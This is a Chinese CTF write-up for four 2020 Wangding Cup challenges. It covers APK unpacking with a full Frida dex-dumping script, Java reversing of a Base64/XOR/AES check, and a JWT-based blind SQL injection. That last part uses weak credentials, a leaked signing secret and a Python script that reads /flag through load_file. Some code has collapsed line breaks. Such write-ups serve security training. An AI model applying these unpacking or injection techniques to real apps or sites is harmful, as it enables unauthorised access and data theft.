签到题

思路

浏览器F12,调取ajax,输入队伍token,获取flag

过程

(1)浏览器进入F12查看js,看到game_manage.js这个js,看名字像是控制游戏的

(2)进入js,通过搜索“move”和“ajax”等关键字,以及if (f.value == 1024)条件,看到如下代码,是给后端发请求并弹窗

(3)复制该段代码到console,执行,浏览器弹窗,输入战队token,成功获取flag

vulcrack

思路

脱壳APK获取flag

过程

Step 1: 下载apk文件,在frida中使用自己编写的脚本进行脱壳
Step 2: 在jadx中打开脱壳后拿到的dex文件

Step 3:在jadx中观察源码发现,有个名为Flag的类,进入查看源码

Step 4:执行flag中的calcFlagFirstStep()和calcFlagSecondStep()

Step 5:把两个函数的运行结果拼起来,拿到flag并提交
附上frida利用脚本

'use strict';function LogPrint(log) {var theDate = new Date();var hour = theDate.getHours();var minute = theDate.getMinutes();var second = theDate.getSeconds();var mSecond = theDate.getMilliseconds()hour < 10 ? hour = "0" + hour : hour;minute < 10 ? minute = "0" + minute : minute;second < 10 ? second = "0" + second : second;mSecond < 10 ? mSecond = "00" + mSecond : mSecond < 100 ? mSecond = "0" + mSecond : mSecond;var time = hour + ":" + minute + ":" + second + ":" + mSecond;console.log("[" + time + "] " + log);
}function getAndroidVersion() {var version = 0;if (Java.available) {var versionStr = Java.androidVersion;version = versionStr.slice(0, 1);} else {LogPrint("Error: cannot get android version");}LogPrint("Android Version: " + version);return version;
}function getFunctionName() {var i = 0;var functionName = "";// Android 4: hook dvmDexFileOpenPartial// Android 5: hook OpenMemory// after Android 5: hook OpenCommonif (getAndroidVersion() > 4) { // android 5 and later versionvar artExports = Module.enumerateExportsSync("libart.so");for (i = 0; i < artExports.length; i++) {if (artExports[i].name.indexOf("OpenMemory") !== -1) {functionName = artExports[i].name;LogPrint("index " + i + " function name: " + functionName);break;} else if (artExports[i].name.indexOf("OpenCommon") !== -1) {functionName = artExports[i].name;LogPrint("index " + i + " function name: " + functionName);break;}}} else { //android 4var dvmExports = Module.enumerateExportsSync("libdvm.so");if (dvmExports.length !== 0) { // check libdvm.so firstfor (i = 0; i < dvmExports.length; i++) {if (dvmExports[i].name.indexOf("dexFileParse") !== -1) {functionName = dvmExports[i].name;LogPrint("index " + i + " function name: " + functionName);break;}}} else { // if not load libdvm.so, check libart.sodvmExports = Module.enumerateExportsSync("libart.so");for (i = 0; i < dvmExports.length; i++) {if (dvmExports[i].name.indexOf("OpenMemory") !== -1) {functionName = dvmExports[i].name;LogPrint("index " + i + " function name: " + functionName);break;}}}}return functionName;
}function getProcessName() {var processName = "";var fopenPtr = Module.findExportByName("libc.so", "fopen");var fopenFunc = new NativeFunction(fopenPtr, 'pointer', ['pointer', 'pointer']);var fgetsPtr = Module.findExportByName("libc.so", "fgets");var fgetsFunc = new NativeFunction(fgetsPtr, 'int', ['pointer', 'int', 'pointer']);var pathPtr = Memory.allocUtf8String("/proc/self/cmdline");var openFlagsPtr = Memory.allocUtf8String("r");var fp = fopenFunc(pathPtr, openFlagsPtr);if (fp.isNull() === false) {var buffData = Memory.alloc(128);var ret = fgetsFunc(buffData, 128, fp);if (ret !== 0) {processName = Memory.readCString(buffData);LogPrint("processName " + processName);}}return processName;
}function arraybuffer2hexstr(buffer) {var hexArr = Array.prototype.map.call(new Uint8Array(buffer),function (bit) {return ('00' + bit.toString(16)).slice(-2)});return hexArr.join(' ');
}function checkDexMagic(dataAddr) {var magicMatch = true;var magicFlagHex = [0x64, 0x65, 0x78, 0x0a, 0x30, 0x33, 0x35, 0x00];for (var i = 0; i < 8; i++) {if (Memory.readU8(ptr(dataAddr).add(i)) !== magicFlagHex[i]) {magicMatch = false;break;}}return magicMatch;
}function checkOdexMagic(dataAddr) {var magicMatch = true;var magicFlagHex = [0x64, 0x65, 0x79, 0x0a, 0x30, 0x33, 0x36, 0x00];for (var i = 0; i < 8; i++) {if (Memory.readU8(ptr(dataAddr).add(i)) !== magicFlagHex[i]) {magicMatch = false;break;}}return magicMatch;
}function dumpDex(moduleFuncName, processName) {if (moduleFuncName !== "") {var hookFunction;if (getAndroidVersion() > 4) { // android 5 and later versionhookFunction = Module.findExportByName("libart.so", moduleFuncName);} else { // android 4hookFunction = Module.findExportByName("libdvm.so", moduleFuncName); // check libdvm.so firstif (hookFunction == null) {hookFunction = Module.findExportByName("libart.so", moduleFuncName);  if not load libdvm.so, check libart.so}}Interceptor.attach(hookFunction, {onEnter: function (args) {var begin = 0;var dexMagicMatch = false;var odexMagicMatch = false;dexMagicMatch = checkDexMagic(args[0]);if (dexMagicMatch === true) {begin = args[0];} else {odexMagicMatch = checkOdexMagic(args[0]);if (odexMagicMatch === true) {begin = args[0];}}if (begin === 0) {dexMagicMatch = checkDexMagic(args[1]);if (dexMagicMatch === true) {begin = args[1];} else {odexMagicMatch = checkOdexMagic(args[1]);if (odexMagicMatch === true) {begin = args[1];}}}if (dexMagicMatch === true) {LogPrint("magic : " + Memory.readUtf8String(begin));//console.log(hexdump(begin, { offset: 0, header: false, length: 64, ansi: false }));var address = parseInt(begin, 16) + 0x20;var dex_size = Memory.readInt(ptr(address));LogPrint("dex_size :" + dex_size);var dex_path = "/data/data/" + processName + "/" + dex_size + ".dex";var dex_file = new File(dex_path, "wb");dex_file.write(Memory.readByteArray(begin, dex_size));dex_file.flush();dex_file.close();LogPrint("dump dex success, saved path: " + dex_path + "\n");} else if (odexMagicMatch === true) {LogPrint("magic : " + Memory.readUtf8String(begin));//console.log(hexdump(begin, { offset: 0, header: false, length: 64, ansi: false }));var address = parseInt(begin, 16) + 0x0C;var odex_size = Memory.readInt(ptr(address));LogPrint("odex_size :" + odex_size);var odex_path = "/data/data/" + processName + "/" + odex_size + ".odex";var odex_file = new File(odex_path, "wb");odex_file.write(Memory.readByteArray(begin, odex_size));odex_file.flush();odex_file.close();LogPrint("dump odex success, saved path: " + odex_path + "\n");}},onLeave: function (retval) {}});} else {LogPrint("Error: cannot find correct module function.");}
}//start dump dex file
var moduleFucntionName = getFunctionName();
var processName = getProcessName();
if (moduleFucntionName !== "" && processName !== "") {dumpDex(moduleFucntionName, processName);
}

java

思路

反编译java源码,逆推获取flag

过程

Step 1: 通过jadx工具进行反编译出代码如下:

Step 2: 导出之后,再导入Android Studio,查看代码逻辑,改了少部分反编译错误代码后运行:


Step 3: 查看代码逻辑,发现是用户输入值后,通过补位、AES运算和位运算后,再进行base64编码,与值
“VsBDJCvuhD65/+sL+Hlf587nWuIa2MPcqZaq7GMVWI0Vx8l9R42PXWbhCRftoFB3”相等,则用户的输入就是flag,因此下面进行逆运算。

Step 4:如上所说,要逆运算,首先先进行base64解码,代码如下:
public static byte[] decode(byte[] bArr){
return Base64.decode(bArr,Base64.NO_WRAP);
}

Step 5: 原来程序的位运算代码逻辑如下:
public byte[] a(byte[] bArr, int i, int[] iArr) {
if (bArr == null || bArr.length == 0) {
return null;
}
int length = bArr.length;
System.out.println(“data.length”);
System.out.println(length);
for (int i2 = 0; i2 < length; i2++) {
bArr[i2] = (byte) (bArr[i2] ^ i);
}
for (int i3 = 0; i3 < bArr.length; i3++) {
bArr[i3] = (byte) (bArr[i3] ^ iArr[i3]);
}
return bArr;
}
由于该位运算(异或运算)可逆,可写出逆运算代码逻辑如下:
/**
*
* @param i = 22
* @param iArr = {214, 144, 233, 254, 204, 225, 61, 183, 22, 182, 43, 103, 20, 194, 40, 251, 44, 5, 43, 103, 154, 118, 42, 190, 4, 195, 43, 103, 170, 68, 19, 38, 73, 134, 43, 103, 153, 156, 66, 80, 244, 145, 80, 103, 239, 152, 122, 98, 50, 214};
*/
public byte[] a1(byte[] bArr, int i, int[] iArr) {
if (bArr == null || bArr.length == 0) {
return null;
}
int length = bArr.length;
for (int i3 = 0; i3 < bArr.length; i3++) {
bArr[i3] = (byte) (bArr[i3] ^ iArr[i3]);
}
for (int i2 = 0; i2 < length; i2++) {
bArr[i2] = (byte) (bArr[i2] ^ i);
}
return bArr;
}

Step 6: 接下来进行AES逆运算,即AES解密,AES秘钥在源代码中存在:
/**
* @param bArr 密文,待解密
* @param bArr2 密钥:aes_check_key!@#
**/
public static byte[] aesDecrypt(byte[] bArr, byte[] bArr2) {
try {
SecretKeySpec secretKeySpec = new SecretKeySpec(bArr2, “AES”);
Cipher instance = Cipher.getInstance(“AES/ECB/NoPadding”);
instance.init(Cipher.DECRYPT_MODE, secretKeySpec);
byte[] decrypt = instance.doFinal(bArr);
System.out.println(“AES解密:”+ Arrays.toString(decrypt));
return decrypt;
} catch (Exception e) {
e.printStackTrace();
return new byte[0];
}
}

Step 7: 结合以上三步:
(1)首先将
“VsBDJCvuhD65/+sL+Hlf587nWuIa2MPcqZaq7GMVWI0Vx8l9R42PXWbhCRftoFB3”进行base64解码,调用我们Step4中写好的decode函数
(2)之后进行位运算的,调用我们Step5中写好的异或的逆运算函数:a1
(3)最后进行aes解密,调用我们Step6中写好的aesDecrypt函数
写出整个还原flag的函数代码为:
public void test(){
byte[] base64Decode = b64.decode(b.getBytes());
System.out.println(“base64Decode:”+Arrays.toString(base64Decode));
this.d = new d();
byte[] a1 = this.d.a1(base64Decode, 22, this.c);
System.out.println(“位运算:”+Arrays.toString(a1));
byte[] aesSrc = e.aesDecrypt(a1, a.getBytes());
System.out.println(“ASE解密后的字符串:”+new String(aesSrc));
}
(4)该test函数运行后,结果如下:

(5)观察到flag后有多余的字符,是由于原始运算的补位形成的,咱们就把最后多余的6位去掉,在test函数中加上补位运算的逆运算后代码如下:
public void test(){
byte[] base64Decode = b64.decode(b.getBytes());
System.out.println(“base64Decode:”+Arrays.toString(base64Decode));
this.d = new d();
byte[] a1 = this.d.a1(base64Decode, 22, this.c);
System.out.println(“位运算:”+Arrays.toString(a1));
byte[] aesSrc = e.aesDecrypt(a1, a.getBytes());
System.out.println(“ASE解密后的字符串:”+new String(aesSrc));
System.out.println(aesSrc.length);
byte[] target = new byte[aesSrc.length - 6];
System.arraycopy(aesSrc,0,target,0,target.length);
System.out.println(“最终字符串:”+new String(target));
}
(6)以上完整的test函数运算结果如下,获取flag:

js_on

思路

jwt中sql注入读文件获取flag

过程

Step 1:打开url:
http://xx.changame.ichunqiu.com/login.html,弱口令:admin/admin成功登录

Step 2:回到登录页,发现有个注册地方,可成功注册未注册过的账号,如:admin2/admin2

Step 3:登录刚刚自己注册的admin2账号,发现输出不一样,说x明后端肯定判断了当前账号是否为admin,如果不是,就输出hello ……等字样。当前地址为:http://xx.cloudgame2.ichunqiu.com/index.php

Step 4:浏览器F12查看cookie,看到有个token字段,且为JWT格式,说明该系统通过JWT来标识用户,且联想到页面上显示的key值为JWT的token。

Step 5:根据JWT知识,将token内容复制到https://jwt.io/#debugger网站进行base64解码如下,可看到payload字段的user值为admin2:

Step 6:Step 3中提到
http://xxx.cloudgame2.ichunqiu.com/index.php页面对当前用户进行了判断,从而决定页面输出内容,因此猜测user字段存在sql注入漏洞,进行尝试。
https://jwt.io/#debugger 右下角填入secret(即页面上回显的key值),此处user参数肯定为字符型,开始构造攻击语句,左边获取对应JWT。
Step7:(1)构造攻击payload:
{
“user”: “admin’//and//1=2#”,
“news”: “key:xRtYMDqyCCxYxi9a@LgcGpnmM2X8i&6"
}
获取左边JWT:

burpsuite发包,响应如下:

(2)构造攻击payload:
{
“user”: “admin’//and//1=1#”,
“news”: "key:xRtYMDqyCCxYxi9a@LgcGpnmM2X8i&6”
}
获取左边JWT:

burpsuite发包,响应如下:

(3)根据两个不通响应,能够确认此处存在sql注入漏洞

Step8:构造攻击代码:“user”: "aa’-- “和"user”: "'select"获取对应JWT,发送请求包发现回包存在“Get Out Hacker!!!”字样,说明后端有做攻击检测。


Step9:结合之前回包的“

这里是你的信息:???Why there is No Message for you?

”,通过substr+loadfile函数,获取/flag文件中内容,构造python利用脚本如下:

coding:utf-8

import jwt
import requestsurl = 'http://xxx.changame.ichunqiu.com/'
data = ''
dict = '0123456789abcdeflg-{}'
for i in range(1, 60):for j in dict:encoded_jwt = jwt.encode({"user":"admin'/**/and/**/load_file('/flag')/**/regexp/**/'^" + data + j + "'#","news":"key:xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6"},'xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6',headers={"alg":"HS256","typ":"jwt"})cookies = {'UM_distinctid':'','Hm_lvt_2d0601bd28de7d49818249cf35d95943':'','__jsluid_h':'','token':encoded_jwt}try:res = requests.get(url=url,cookies=cookies,timeout=3)if 'xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6' in res.content:data += jprint(str(data))breakexcept Exception as e:print(str(e))

2020网鼎杯玄武组部分题writeup(签到/vulcrack/java/js_on)相关推荐

  1. 2020网鼎杯玄武组re baby_vm复盘

    baby_vm 0x00 前言 这是一道来自2020网鼎杯玄武组的逆向题,题目的重难点在分析vm流程.这届比赛我没有参加,看到 一些博客都在分析这道题目,于是在闲暇时间复盘学习一下. 0x01分析 首 ...

  2. CTF-2020网鼎杯-玄武组-web题-ssrfme知识回顾

    CTF-2020网鼎杯-玄武组-web题-ssrfme知识回顾 思路:SSRF结合redis主从复制RCE Tip:使用DNS重绑定绕过限制 参考笔记:redis 主服务器:192.168.8.103 ...

  3. 2020网鼎杯青龙组部分题目writeup

    2020网鼎杯青龙组部分题目writeup 0x00 Crypto之boom 0x00 Crypto之boom 下载下来是个exe文件,拖到cmd运行(切记一定不要双击,用cmd打开,双击运行后最后程 ...

  4. [re]符号执行一把梭:2020网鼎杯青龙组re_signal_wp

    [re]符号执行一把梭:2020网鼎杯青龙组re_signal_wp 这道题是2020网鼎杯青龙组的一道逆向提signal,一道虚拟机逆向题目,题目本身不难,可以直接分析也可以符号执行秒掉. 题目分析 ...

  5. [pwn]星号格式化串:2020网鼎杯白虎组pwn quantum_entanglement wp

    [pwn]星号格式化串:2020网鼎杯白虎组pwn quantum_entanglement wp 文章目录 [pwn]星号格式化串:2020网鼎杯白虎组pwn quantum_entanglemen ...

  6. 网鼎杯玄武组部分web题解

    本文涉及知识点靶场练习:SSRF漏洞进阶实践-攻击内网Redis:通过gopher协议攻击Redis,如果内网中的Redis存在未授权访问漏洞,当Redis服务以root权限运行时,利用gopher协 ...

  7. 网鼎杯青龙组 web题-AreUSerialz

    //复现地址:https://buuoj.cn/challenges //开启环境后获得源码一份. <?phpinclude("flag.php");highlight_fi ...

  8. 2020网鼎杯青龙组部分题目WP

    0x00 Crypto之boom 下载下来是个exe文件,拖到cmd运行(切记一定不要双击,用cmd打开) 找个md5网站解密,得到明文 输入后得到一个方程组,解方程组(找个就不用说了,初中知识) 输 ...

  9. 2020网鼎杯(青龙组)--WEB--AreUSerialz(反序列化)

    2020网鼎杯(青龙组)–WEB–AreUSerialz(反序列化) 反序列化好像要开窍了 <?phpinclude("flag.php"); 我们要找的flag应该在这里h ...

最新文章

  1. 通过BeanShell获取UUID并将参数传递给Jmeter
  2. DAIC:针对BEC欺诈的开源利器
  3. mysql数据导库常用操作
  4. Vivado 双口RAM 的调用和实现
  5. 【Java自顶向下】HashMap面试题(2021最新版)
  6. datatable删除csv中的一列
  7. python依赖平台吗_在Python中创建快速循环最依赖于平台和pythonversion的方法是什么?...
  8. 硕博招生,土耳其Koç大学和商业银行合作的人工智能中心
  9. python基础教程自学网-Python基础系统管理学习手册视频教程
  10. TVideoGrabber如何将网络摄像头影像实时发布到网络
  11. PHP对接银联电子支付接口开发
  12. 访谈 | 币圈量化群英会——寻找适合你的量化基金!
  13. JavaScript 3D球形标签云代码
  14. Ajax选项卡、隔行换色、弹出遮罩层…
  15. php进程间通信 yoc_php 进程间通信 ipc
  16. 谷仓加密方式_谷仓紧缩谷物如何导致苹果计算机
  17. java 数字拆分_如何在java中分割数字?
  18. 自适应,响应式以及图片的性能优化(响应式图片)
  19. linux环境搭建实践总结,linux实习心得体会
  20. 软件测试 Web自动化测试 基础知识 HTML CSS JavaScript

热门文章

  1. (续)Visual Studio 连接SQL Server数据库,代码连接
  2. 渗透前戏:dmitry简介
  3. Python爬虫系列之爬取某社区团微信小程序店铺商品数据
  4. 【中间件】Redis监控以及指标
  5. c# jobject 的数据结构的解析
  6. 厦大教授计算机专业,厦门大学信息科学与技术学院计算机科学系导师介绍:吴梅红...
  7. AS5600 12 位可编程非接触式电位器
  8. ad采样做按键开关_【经验】如何使用模拟开关对单片机AD口进行扩展?
  9. php微信会员卡平台,微信公众号实现会员卡领取功能
  10. python 中文文本分析